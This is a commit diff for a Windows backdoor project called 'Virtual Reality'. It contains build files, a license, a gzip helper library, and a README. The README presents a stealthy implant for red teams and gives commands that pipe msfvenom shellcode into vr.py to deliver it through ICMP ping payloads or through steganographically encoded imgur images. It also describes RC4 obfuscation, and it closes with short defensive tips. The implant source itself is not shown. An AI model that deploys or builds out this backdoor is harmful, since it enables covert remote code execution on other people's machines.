Hello World.

.gitattributes

@@ -0,0 +1 @@
+* text=lf

.gitignore

@@ -0,0 +1,3 @@
+.*
+__pycache__
+*.pyc

CMakeLists.txt

@@ -0,0 +1,54 @@
+#
+# MIT License
+#
+# Copyright (c) 2019 Rokas Kupstys
+#
+# Permission is hereby granted, free of charge, to any person obtaining a
+# copy of this software and associated documentation files (the "Software"),
+# to deal in the Software without restriction, including without limitation
+# the rights to use, copy, modify, merge, publish, distribute, sublicense,
+# and/or sell copies of the Software, and to permit persons to whom the
+# Software is furnished to do so, subject to the following conditions:
+#
+# The above copyright notice and this permission notice shall be included in
+# all copies or substantial portions of the Software.
+#
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
+# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
+# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
+# DEALINGS IN THE SOFTWARE.
+#
+
+cmake_minimum_required(VERSION 3.8)
+
+project(VR)
+
+set(CMAKE_ARCHIVE_OUTPUT_DIRECTORY ${CMAKE_BINARY_DIR}/lib)
+set(CMAKE_LIBRARY_OUTPUT_DIRECTORY ${CMAKE_BINARY_DIR}/lib)
+set(CMAKE_RUNTIME_OUTPUT_DIRECTORY ${CMAKE_BINARY_DIR}/bin)
+set(CMAKE_CXX_STANDARD 17)
+
+if (NOT WIN32)
+    message(FATAL_ERROR "This project is meant for Windows platform only")
+endif ()
+
+if (NOT MINGW)
+    message(FATAL_ERROR "This project builds only with MingW")
+endif ()
+
+set (EXTRA_LINKER_FLAGS "-nodefaultlibs -dynamic -ffunction-sections -fdata-sections -Wl,-gc-sections")
+set (CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} ${EXTRA_LINKER_FLAGS}")
+set (CMAKE_EXE_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} ${EXTRA_LINKER_FLAGS}")
+set (CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fno-rtti -fno-exceptions")
+set (CMAKE_C_FLAGS_MINSIZEREL "${CMAKE_C_FLAGS_MINSIZEREL} -s -DNDEBUG")
+set (CMAKE_CXX_FLAGS_MINSIZEREL "${CMAKE_CXX_FLAGS_MINSIZEREL} -s -DNDEBUG")
+set (CMAKE_C_FLAGS_DEBUG "${CMAKE_C_FLAGS_DEBUG} -D_DEBUG")
+set (CMAKE_CXX_FLAGS_DEBUG "${CMAKE_CXX_FLAGS_DEBUG} -D_DEBUG")
+set (CMAKE_C_FLAGS_RELWITHDEBINFO "${CMAKE_C_FLAGS_RELWITHDEBINFO} -D_DEBUG")
+set (CMAKE_CXX_FLAGS_RELWITHDEBINFO "${CMAKE_CXX_FLAGS_RELWITHDEBINFO} -D_DEBUG")
+
+add_subdirectory(dep)
+add_subdirectory(src)

LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2019 Rokas Kupstys
+
+Permission is hereby granted, free of charge, to any person obtaining a
+copy of this software and associated documentation files (the "Software"),
+to deal in the Software without restriction, including without limitation
+the rights to use, copy, modify, merge, publish, distribute, sublicense,
+and/or sell copies of the Software, and to permit persons to whom the
+Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in
+all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
+THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
+FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
+DEALINGS IN THE SOFTWARE.

README.md

@@ -0,0 +1,100 @@
+Virtual Reality
+===============
+
+This is a backdoor project for windows operating systems.
+
+## Intended audience
+
+This is a proof-of-concept stealthy backdoor aimed to aid red teams in maintaining
+control of their targets during security evaluation process. Project also intends
+to expose ways to abuse standard features.
+
+## Features
+
+Extremely stealthy backdoor for Windows platform.
+
+* ICMP-PING backdoor. Passively listens for incoming pings and executes shellcode
+delivered in ping payload.
+* HTTP backdoor using steganographically encoded images hosted on imgur.com
+* Runs on anything from XP to W10
+
+## Details
+
+* Small size by using tinystl and avoiding standard c++ stl
+* Cooperative multitasking achieved by using Windows fibers
+* All dependencies are permissively licensed
+* Permissively licensed, including all dependencies
+
+## Build instructions
+
+Compile using MingW compiler from msys2 distribution. Preferred IDE is CLion.
+
+Compiled artifacts will be found in `cmake-build-*/bin` folder.
+
+## Instructions
+
+Modify `config.h` to suit your needs.
+
+Use `vr.py` to interact with the backdoor.
+
+### Shellcode payload
+
+`vr.py shellcode path/to/shellcode.bin` reads shellcode into script's memory.
+On it's own this is useless therefore combine it with other commands. You may
+use `-` instead of path in order to read shellcode from `stdin`.
+
+### Ping transport
+
+`msfvenom <...> | vr.py shellcode - -- ping 192.168.0.1` reads a shellcode from
+`stdin` and sends it via icmp-ping to `192.168.0.1`. Backdoor running on that
+machine will execute this shellcode.
+
+Shellcode will be delivered to the target by sending it as ICMP-PING packet payload.
+
+![ping-demo](https://user-images.githubusercontent.com/19151258/52339219-2c742600-2a15-11e9-95b0-212485421e35.png)
+
+Content of packet appears to be random. The only give-away that something is up
+is a rather big packet size, although it is possible to customized packet size
+using ping utility or specify custom payload (linux).
+
+### imgur.com transport
+
+`msfvenom <...> | vr.py shellcode - -- png path/to/image.png` reads a shellcode
+from `stdin` and encodes into specified `image.png`. This image must exist and
+it must be in RGB format (no alpha). Resulting image should be uploaded to
+https://imgur.com/ and tagged with one or more tags while one of tags must be
+one that is specified in `config.h`.
+
+Shellcode will be encoded into specified image by altering last two bits of
+each color component in the target image. 1 byte needs 4 color components
+to be encoded and thus requires 1.(3) pixels. Encoded images are indistinguishable
+from original to the naked eye. Backdoor queries imgur API for listing images
+tagged with a configured tag. Every new image is downloaded and inspected for
+encoded payload.
+
+![steg-demo](https://user-images.githubusercontent.com/19151258/52338654-adcab900-2a13-11e9-9887-3a55cde9dc36.png)
+
+Left - original image. Right - image with encoded payload. Bottom - difference mask.
+120x75 image was used. As you can see only a tiny portion of pretty small iamge is used
+to encode 449 bytes payload.
+
+## Security
+
+Payload is always obfuscated using RC4 algorithm. As you probably have guessed
+replay attacks are a thing against this backdoor. Also backdoor may be controlled
+by a rival blue team if they have reverse-engineered sample and recovered RC4
+key. Utmost security is not the point of this project. If blue team is on to the
+backdoor - nothing will save it anyway.
+
+## Recommendations
+
+* If possible - filter out ICMP-PING packets with in firewall
+* Take a proactive approach in monitoring your networks. Log everything and
+look for abnormalities. Chances are your servers have no business querying
+imgur.com or similar social media domains.
+
+## etc
+
+Q: Why this name? This has nothing to do with virtual reality.
+
+A: Nothing at all. And no reason really. Naming is hard.

dep/CMakeLists.txt

@@ -0,0 +1,30 @@
+#
+# MIT License
+#
+# Copyright (c) 2019 Rokas Kupstys
+#
+# Permission is hereby granted, free of charge, to any person obtaining a
+# copy of this software and associated documentation files (the "Software"),
+# to deal in the Software without restriction, including without limitation
+# the rights to use, copy, modify, merge, publish, distribute, sublicense,
+# and/or sell copies of the Software, and to permit persons to whom the
+# Software is furnished to do so, subject to the following conditions:
+#
+# The above copyright notice and this permission notice shall be included in
+# all copies or substantial portions of the Software.
+#
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
+# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
+# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
+# DEALINGS IN THE SOFTWARE.
+#
+
+add_subdirectory(ntdll)
+add_subdirectory(tinystl)
+add_subdirectory(miniz)
+add_subdirectory(mini-gzip)
+add_subdirectory(picopng)
+add_subdirectory(tiny-json)

dep/mini-gzip/CMakeLists.txt

@@ -0,0 +1,28 @@
+#
+# MIT License
+#
+# Copyright (c) 2019 Rokas Kupstys
+#
+# Permission is hereby granted, free of charge, to any person obtaining a
+# copy of this software and associated documentation files (the "Software"),
+# to deal in the Software without restriction, including without limitation
+# the rights to use, copy, modify, merge, publish, distribute, sublicense,
+# and/or sell copies of the Software, and to permit persons to whom the
+# Software is furnished to do so, subject to the following conditions:
+#
+# The above copyright notice and this permission notice shall be included in
+# all copies or substantial portions of the Software.
+#
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
+# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
+# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
+# DEALINGS IN THE SOFTWARE.
+#
+
+file(GLOB_RECURSE SOURCE_FILES *.c *.h)
+add_library(mini-gzip STATIC ${SOURCE_FILES})
+target_link_libraries(mini-gzip PUBLIC miniz)
+target_include_directories(mini-gzip PUBLIC ${CMAKE_CURRENT_SOURCE_DIR})

dep/mini-gzip/mini_gzip.c

@@ -0,0 +1,138 @@
+/*
+ * BSD 2-clause license
+ * Copyright (c) 2013 Wojciech A. Koszek <[email protected]>
+ * 
+ * Based on:
+ * 
+ * https://github.com/strake/gzip.git
+ *
+ * I had to rewrite it, since strake's version was powered by UNIX FILE* API,
+ * while the key objective was to perform memory-to-memory operations
+ */
+
+#include <assert.h>
+#include <stdint.h>
+#include <string.h>
+
+#ifdef MINI_GZ_DEBUG
+#include <stdio.h>
+#endif
+
+#include <miniz.h>
+#include "mini_gzip.h"
+
+int
+mini_gz_start(struct mini_gzip *gz_ptr, void *mem, size_t mem_len)
+{
+	uint8_t		*hptr, *hauxptr, *mem8_ptr;
+	uint16_t	fextra_len;
+
+	assert(gz_ptr != NULL);
+
+	mem8_ptr = (uint8_t *)mem;
+	hptr = mem8_ptr + 0;		// .gz header
+	hauxptr = mem8_ptr + 10;	// auxillary header
+
+	gz_ptr->hdr_ptr = hptr;
+	gz_ptr->data_ptr = 0;
+	gz_ptr->data_len = 0;
+	gz_ptr->total_len = mem_len;
+	gz_ptr->chunk_size = 1024;
+
+	if (hptr[0] != 0x1F || hptr[1] != 0x8B) {
+		GZDBG("hptr[0] = %02x hptr[1] = %02x\n", hptr[0], hptr[1]);
+		return (-1);
+	}
+	if (hptr[2] != 8) {
+		return (-2);
+	}
+	if (hptr[3] & 0x4) {
+		fextra_len = hauxptr[1] << 8 | hauxptr[0];
+		gz_ptr->fextra_len = fextra_len;
+		hauxptr += 2;
+		gz_ptr->fextra_ptr = hauxptr;
+	}
+	if (hptr[3] & 0x8) {
+		gz_ptr->fname_ptr = hauxptr;
+		while (*hauxptr != '\0') {
+			hauxptr++;
+		}
+		hauxptr++;
+	}
+	if (hptr[3] & 0x10) {
+		gz_ptr->fcomment_ptr = hauxptr;
+		while (*hauxptr != '\0') {
+			hauxptr++;
+		}
+		hauxptr++;
+	}
+	if (hptr[3] & 0x2) /* FCRC */ {
+		gz_ptr->fcrc = (*(uint16_t *)hauxptr);
+		hauxptr += 2;
+	}
+	gz_ptr->data_ptr = hauxptr;
+	gz_ptr->data_len = mem_len - (hauxptr - hptr);
+	gz_ptr->magic = MINI_GZIP_MAGIC;
+	return (0);
+}
+
+void
+mini_gz_chunksize_set(struct mini_gzip *gz_ptr, int chunk_size)
+{
+
+	assert(gz_ptr != 0);
+	assert(gz_ptr->magic == MINI_GZIP_MAGIC);
+	gz_ptr->chunk_size = chunk_size;
+}
+
+void
+mini_gz_init(struct mini_gzip *gz_ptr)
+{
+
+	memset(gz_ptr, 0xffffffff, sizeof(*gz_ptr));
+	gz_ptr->magic = MINI_GZIP_MAGIC;
+	mini_gz_chunksize_set(gz_ptr, 1024);
+}
+
+
+int
+mini_gz_unpack(struct mini_gzip *gz_ptr, void *mem_out, size_t mem_out_len)
+{
+	z_stream s;
+	int	ret, in_bytes_avail, bytes_to_read;
+
+	assert(gz_ptr != 0);
+	assert(gz_ptr->data_len > 0);
+	assert(gz_ptr->magic == MINI_GZIP_MAGIC);
+
+	memset (&s, 0, sizeof (z_stream));
+	inflateInit2(&s, -MZ_DEFAULT_WINDOW_BITS);
+	in_bytes_avail = gz_ptr->data_len;
+	s.avail_out = mem_out_len;
+	s.next_in = gz_ptr->data_ptr;
+	s.next_out = mem_out;
+	for (;;) {
+		bytes_to_read = MINI_GZ_MIN(gz_ptr->chunk_size, in_bytes_avail);
+		s.avail_in += bytes_to_read;
+		ret = mz_inflate(&s, MZ_SYNC_FLUSH);
+		in_bytes_avail -= bytes_to_read;
+		if (s.avail_out == 0 && in_bytes_avail != 0) {
+			return (-3);
+		}
+		assert(ret != MZ_BUF_ERROR);
+		if (ret == MZ_PARAM_ERROR) {
+			return (-1);
+		}
+		if (ret == MZ_DATA_ERROR) {
+			return (-2);
+		}
+		if (ret == MZ_STREAM_END) {
+			break;
+		}
+	}
+	ret = inflateEnd(&s);
+	if (ret != Z_OK) {
+		return (-4);
+	}
+	return (s.total_out);
+}